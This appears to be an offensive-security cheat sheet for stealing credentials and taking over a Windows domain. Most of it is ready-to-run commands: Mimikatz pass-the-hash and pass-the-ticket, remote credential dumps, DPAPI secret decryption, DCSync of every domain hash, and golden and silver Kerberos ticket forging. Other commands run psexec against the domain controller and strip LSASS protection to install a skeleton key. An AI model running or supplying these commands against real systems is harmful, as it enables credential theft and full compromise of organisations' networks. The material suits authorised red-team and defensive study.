Some commands need elevated/debug privileges you can enable them with token::elevate and privilege::debug.

Useful commands to dump everything we can:


Creates tickets from hashes instead of passing hashes directly

Invoke-Mimikatz -Command '" kerberos:ptt <ticket>"'
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:<command>"'

Dump remote credentials

Invoke-Mimikatz -DumpCreds -ComputerName @("<target1>", "<target2>")



Note: Make you are in a session of type 1, if not migrate to a process that has it. Otherwise these steps don't need special privileges.

dir C:\Users\<username>\AppData\Local\Microsoft\Credentials
dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\<id>

Note guidMasterKey and pdData. Then there should be matching directories in:

dir C:\Users\<username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-<...>
dpapi::masterkey /in:C:\Users\<username>\AppData\Roaming\Microsoft\Protect\S-1-5-21-<...>\<guidMasterKey> /rpc"

This will show a key file at the bottom, the actual MasterKey. Now we can decrypt the blob:

dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\<...>/masterkey:<MasterKey>

Run a combination of attacks:

SharpDPAPI triage

Decrypt the secret of the user you are logged in as:

SharpDPAPI rdg /unprotect




lsadump::dcsync /domain:<> /all /csv

Golden Ticket

Allows us to sign valid TGTs for the domain (requires the krbtgt hash).

kerberos::golden /user:<> /domain:<> /sid:<> /krbtgt:<> /ticket:<outfile>

This can be converted to base64 and then used with Rubeus to pass the ticket:

Rubeus ptt /ticket:<>

It can also be used in mimikatz:

kerberos::ptt <filename>
dir \\DC\\C$
psexec \\DC cmd.exe

Alternatively this can be done in Metasploit's Kiwi:

golden_ticket_create -d <domain> -k <krbtgt hash> -s <domain-sid> -u <name, does not have to exist (but can)> -t <filename>
kerberos_ticket_use <filename>

Silver Ticket

Silver tickets are rarely used, the only allow access to services on a single box. To create it we need the machine account hash:

kerberos::golden /user:<> /domain:<> /sid:<> /target:<> /service:<> /rc4:<> /ticket:<outfile>

Remove process protection

Running !+ loads 'mimidrv', which one needs to copy into the same directory as mimikatz.exe in order for this to work.

!processprotect /process:lsass.exe /remove
# payload e.g. misc::skeleton

Alternatively we can use PPLKiller which uses a signed driver by MSI to disable process protection (really a matter of detection, mimidrv works just fine with AV disabled).


Last updated